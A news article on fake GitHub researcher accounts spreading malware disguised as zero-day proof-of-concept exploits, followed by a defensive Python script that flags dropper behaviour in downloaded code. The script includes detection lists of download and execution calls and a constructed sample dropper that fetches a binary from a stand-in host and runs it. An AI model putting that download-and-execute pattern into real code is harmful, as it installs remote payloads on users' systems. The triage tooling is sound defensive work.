
Fraudulent GitHub intrusion: fake accounts spread malware

A network of fake researchers is using GitHub to spread malicious code disguised as proof-of-concept exploits for supposed zero-day vulnerabilities


Several fake GitHub accounts linked to a fraudulent cybersecurity firm have been caught spreading malicious repositories on the code hosting service. Seven of these repositories, still accessible at the time of writing, pose as proof-of-concept (PoC) exploits for alleged zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange.

A network of lies

VulnCheck, which discovered the activity, said the authors of these repositories put considerable effort into making them plausible: they set up a series of Twitter accounts and profiles posing as members of a non-existent company called High Sierra Cyber Security. VulnCheck first came across these repositories last May, when they were being used to spread similar PoC exploits for supposed zero-day vulnerabilities in Signal and WhatsApp; both of those repositories have since been removed.

Masking the culprits

Not only did the authors share some of their alleged findings on Twitter to boost their credibility, they also used photos of real security researchers from companies such as Rapid7, showing significant effort in building the campaign. The supposed PoC is a Python script that downloads a malicious binary and runs it on the victim's system, whether Windows or Linux. "The attacker put a lot of effort into creating all these fake identities, just to distribute easily recognizable malware," said VulnCheck researcher Jacob Baines. "It is unclear whether they have been successful, but the fact that they continue to pursue this attack strategy suggests that they believe they may be."

Final considerations on information security

It is not yet known whether the actor behind this activity is an amateur or an advanced persistent threat (APT). Security researchers have, however, been targeted before, by North Korean state-backed groups, as Google disclosed in January 2021. These events underscore the importance of caution when pulling code from public repositories: read a PoC before running it, treat one that merely downloads and launches a binary from a remote server instead of exercising the vulnerability itself as a red flag in its own right, and run anything unverified only in an isolated, disposable environment.
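The article gives only the shape of the dropper: an operating-system check, a download, an execution. The script below is an added example, not code from the page or from VulnCheck, showing how to triage a downloaded Python "PoC" statically before anyone runs it. It walks the file's syntax tree with the standard library `ast` module and flags each of those stages. The indicator lists and both sample scripts are assumptions constructed for this example; the URLs in them use the reserved `.invalid` domain and resolve to nothing.

```python
"""Static triage of a downloaded "PoC" before anyone runs it.

Added example for this article; not code from the page or from VulnCheck.
It parses a Python file with the standard `ast` module and flags the
dropper shape the article describes: pick a payload per operating system,
fetch a binary from the network, make it executable, run it. The two
sample scripts at the bottom are constructed for this example.
"""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Assumed indicator lists; extend them for other libraries (httpx, pycurl, ...).
FETCH_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "urlopen", "urlretrieve", "requests.get", "requests.post",
}
EXEC_CALLS = {
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "subprocess.check_call",
    "os.system", "os.popen", "os.startfile", "os.execv", "os.execvp",
    "ctypes.CDLL", "ctypes.WinDLL",
    "exec", "eval",  # code assembled at runtime is an execution sink too
}
PERM_CALLS = {"os.chmod"}
# Attribute accesses used to branch on the victim's OS.
PLATFORM_ATTRS = {"platform.system", "sys.platform", "os.name", "platform.machine"}


@dataclass(frozen=True)
class Finding:
    stage: str    # fetch | execute | chmod | platform | url
    detail: str   # the call, attribute or literal that triggered it
    line: int


def _dotted(node: ast.AST) -> str | None:
    """Render an `a.b.c` attribute chain (or a bare name) as a string; None otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage(source: str) -> list[Finding]:
    """Walk the AST once and record every dropper stage with its line number."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in FETCH_CALLS:
                findings.append(Finding("fetch", name, node.lineno))
            elif name in EXEC_CALLS:
                findings.append(Finding("execute", name, node.lineno))
            elif name in PERM_CALLS:
                findings.append(Finding("chmod", name, node.lineno))
        elif isinstance(node, ast.Attribute):
            # Catches both `platform.system()` (the call's func) and `sys.platform`.
            name = _dotted(node)
            if name in PLATFORM_ATTRS:
                findings.append(Finding("platform", name, node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                findings.append(Finding("url", node.value, node.lineno))
    return findings


def verdict(findings: list[Finding]) -> str:
    """Fetch plus execute in one script is the dropper signature; the rest needs eyes."""
    stages = {f.stage for f in findings}
    if {"fetch", "execute"} <= stages:
        return "dropper"
    if stages & {"fetch", "execute", "chmod"}:
        return "review"
    return "no-dropper-pattern"


# Constructed sample shaped like the article's PoC: OS check, download, chmod, run.
SUSPECT_POC = '''
import os, platform, subprocess, urllib.request

def exploit(target):
    if platform.system() == "Windows":
        url, out = "https://poc.example.invalid/exploit.exe", "exploit.exe"
    else:
        url, out = "https://poc.example.invalid/exploit", "exploit"
    urllib.request.urlretrieve(url, out)
    os.chmod(out, 0o755)
    subprocess.run([os.path.abspath(out), target])
'''

# Constructed sample of a PoC that stays in-process: no download, no spawned binary.
BENIGN_POC = '''
import socket

def exploit(host, port):
    s = socket.create_connection((host, port))
    s.sendall(b"A" * 4096)
    return s.recv(1024)
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_POC), ("benign", BENIGN_POC)):
        found = triage(src)
        print(f"{label}: {verdict(found)}")
        for f in found:
            print(f"  line {f.line:>2}  {f.stage:<8} {f.detail}")
```

Run as `python triage_poc.py` to see each flagged line: the first sample is reported as a dropper because it both fetches remote content and spawns a process, while the second, which only talks to its target over a socket, produces no findings. This is a triage aid, not a proof of safety. Base64 blobs decoded at runtime, heavily obfuscated code, or a non-Python payload elsewhere in the same repository will slip past it, so the final step is still reading the code and running it only in an isolated environment.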


06/14/2023 11:02

Editorial AI
